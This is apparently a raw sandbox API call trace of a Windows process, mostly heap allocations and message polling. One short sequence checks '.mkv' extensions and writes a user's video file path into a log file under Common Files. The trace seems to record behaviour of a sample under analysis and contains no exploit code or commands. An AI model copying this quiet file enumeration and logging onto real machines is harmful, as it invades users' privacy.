[0192.888] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mkv", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0192.888] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".mkv", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0192.888] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0192.888] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1af0 [0192.888] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ad0 [0192.889] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0192.889] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deee8 [0192.889] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f70 [0192.889] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0192.889] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0192.889] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ad0 [0192.889] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deba0 [0192.889] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd330 [0192.889] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ac0 [0192.889] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4c8 [0192.889] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0192.889] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ad0 [0192.889] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd420 [0192.889] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\log.txt" (normalized: "c:\\progra~2\\common~1\\log.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x160 [0192.889] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0192.890] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f424 | out: lpNewFilePointer=0x0) returned 1 [0192.890] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0192.890] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f404 | out: lpNewFilePointer=0x0) returned 1 [0192.890] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0192.890] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10000) returned 0xbda010 [0192.890] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0192.890] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0192.890] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f414 | out: lpNewFilePointer=0x0) returned 1 [0192.890] ReadFile (in: hFile=0x160, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87f43c*=0x3503, lpOverlapped=0x0) returned 1 [0192.890] ReadFile (in: hFile=0x160, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87f43c*=0x0, lpOverlapped=0x0) returned 1 [0192.890] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x3503, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0192.891] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f404 | out: lpNewFilePointer=0x0) returned 1 [0192.891] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0192.891] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbda010 | out: hHeap=0x8a0000) returned 1 [0192.891] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7c8 [0192.891] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0192.891] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\CCOSsWXcEV8ZF\\S8EN.flyingship.mkv\r\n", cchWideChar=73, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 73 [0192.891] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x49) returned 0x9238c0 [0192.891] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\CCOSsWXcEV8ZF\\S8EN.flyingship.mkv\r\n", cchWideChar=73, lpMultiByteStr=0x9238c0, cbMultiByte=73, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\CCOSsWXcEV8ZF\\S8EN.flyingship.mkv\r\n", lpUsedDefaultChar=0x0) returned 73 [0192.891] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0192.891] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x50) returned 0x923b28 [0192.891] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9238c0 | out: hHeap=0x8a0000) returned 1 [0192.891] WriteFile (in: hFile=0x160, lpBuffer=0x923b28*, nNumberOfBytesToWrite=0x48, lpNumberOfBytesWritten=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0x923b28*, lpNumberOfBytesWritten=0x87f43c*=0x48, lpOverlapped=0x0) returned 1 [0192.891] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x923b28 | out: hHeap=0x8a0000) returned 1 [0192.891] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0192.891] CloseHandle (hObject=0x160) returned 1 [0192.894] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0192.894] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1990 | out: hHeap=0x8a0000) returned 1 [0192.894] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbca008 | out: hHeap=0x8a0000) returned 1 [0192.894] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ae18 | out: hHeap=0x8a0000) returned 1 [0192.894] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db138 | out: hHeap=0x8a0000) returned 1 [0192.894] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0192.894] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0192.894] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0192.894] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x907778 | out: hHeap=0x8a0000) returned 1 [0192.894] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0192.894] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd420 | out: hHeap=0x8a0000) returned 1 [0192.894] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0192.894] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de858 | out: hHeap=0x8a0000) returned 1 [0192.894] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0192.894] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90add8 | out: hHeap=0x8a0000) returned 1 [0192.894] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0192.894] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0f0 | out: hHeap=0x8a0000) returned 1 [0192.894] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba000 | out: hHeap=0x8a0000) returned 1 [0192.894] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de218 | out: hHeap=0x8a0000) returned 1 [0192.894] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0192.894] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de920 | out: hHeap=0x8a0000) returned 1 [0192.895] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c0b78 | out: hHeap=0x8a0000) returned 1 [0192.895] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0192.895] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0192.895] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0192.895] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0192.895] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0192.895] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de9e8 | out: hHeap=0x8a0000) returned 1 [0192.895] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3d8 | out: hHeap=0x8a0000) returned 1 [0192.895] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de970 | out: hHeap=0x8a0000) returned 1 [0192.895] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0192.895] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8a8 | out: hHeap=0x8a0000) returned 1 [0192.895] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0192.895] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda98 | out: hHeap=0x8a0000) returned 1 [0192.895] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0192.895] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0192.895] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de7e0 | out: hHeap=0x8a0000) returned 1 [0192.895] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0192.895] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3f0 | out: hHeap=0x8a0000) returned 1 [0192.895] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0192.895] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0192.895] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea38 | out: hHeap=0x8a0000) returned 1 [0192.895] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0192.895] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19d0 | out: hHeap=0x8a0000) returned 1 [0192.895] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0192.895] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0192.896] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea10 | out: hHeap=0x8a0000) returned 1 [0192.896] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0192.896] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de830 | out: hHeap=0x8a0000) returned 1 [0192.896] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0192.896] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1930 | out: hHeap=0x8a0000) returned 1 [0192.896] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de650 | out: hHeap=0x8a0000) returned 1 [0192.896] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0192.896] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2a0 | out: hHeap=0x8a0000) returned 1 [0192.896] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de308 | out: hHeap=0x8a0000) returned 1 [0192.896] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0192.896] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ad98 | out: hHeap=0x8a0000) returned 1 [0192.896] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0192.896] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0192.896] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1930 [0192.896] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0192.896] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de308 [0192.896] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0192.896] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de308 | out: hHeap=0x8a0000) returned 1 [0192.896] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0192.896] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de308 [0192.896] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1980 [0192.896] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de650 [0192.896] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2a0 [0192.896] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e19d0 [0192.897] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0192.897] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0192.897] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0192.897] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19d0 | out: hHeap=0x8a0000) returned 1 [0192.897] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd8e8 [0192.897] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de830 [0192.897] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba078 [0192.897] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19d0 [0192.897] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0192.897] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0192.897] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db0f0 [0192.897] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0192.897] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0192.897] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea10 [0192.897] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd810 [0192.897] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a00 [0192.897] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3f0 [0192.897] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0192.897] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9e38 [0192.897] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a00 [0192.897] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda98 [0192.897] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0192.897] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8b8 [0192.898] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a00 [0192.898] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3d8 [0192.898] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0192.898] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdab0 [0192.898] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a00 [0192.898] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0192.898] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0192.898] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd648 [0192.898] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a00 [0192.898] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba000 [0192.898] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0192.898] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd618 [0192.898] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a00 [0192.898] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd420 [0192.898] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0192.898] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd870 [0192.898] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a00 [0192.898] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea38 [0192.898] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd738 [0192.898] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1900 [0192.898] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0192.898] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3d8 [0192.899] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1900 [0192.899] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0192.899] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0192.899] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0192.899] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea38 | out: hHeap=0x8a0000) returned 1 [0192.899] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0192.899] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3d8 [0192.899] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a00 [0192.899] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd738 [0192.899] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0192.899] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db138 [0192.899] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea10 | out: hHeap=0x8a0000) returned 1 [0192.899] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7c8 [0192.899] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a00 [0192.899] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0192.899] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fa0 [0192.899] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a00 [0192.899] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9c0 [0192.899] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0192.899] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0192.899] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a00 [0192.899] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0192.899] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f70 [0192.899] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a00 [0192.900] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0192.900] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0192.900] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd588 [0192.900] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a00 [0192.900] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0192.900] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9d8 [0192.900] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a00 [0192.900] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba420 [0192.900] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0192.900] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd330 [0192.900] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a00 [0192.900] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0192.900] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4c8 [0192.900] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a00 [0192.900] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0192.900] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0192.900] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x80) returned 0x9c0b78 [0192.900] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db138 | out: hHeap=0x8a0000) returned 1 [0192.900] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd930 [0192.900] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a00 [0192.900] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0192.900] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0192.900] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd768 [0192.901] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0192.901] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd558 [0192.901] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0192.901] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18c0 [0192.901] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7e0 [0192.901] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0192.901] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0192.901] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0192.901] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0192.901] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea10 [0192.901] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18c0 [0192.901] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7e0 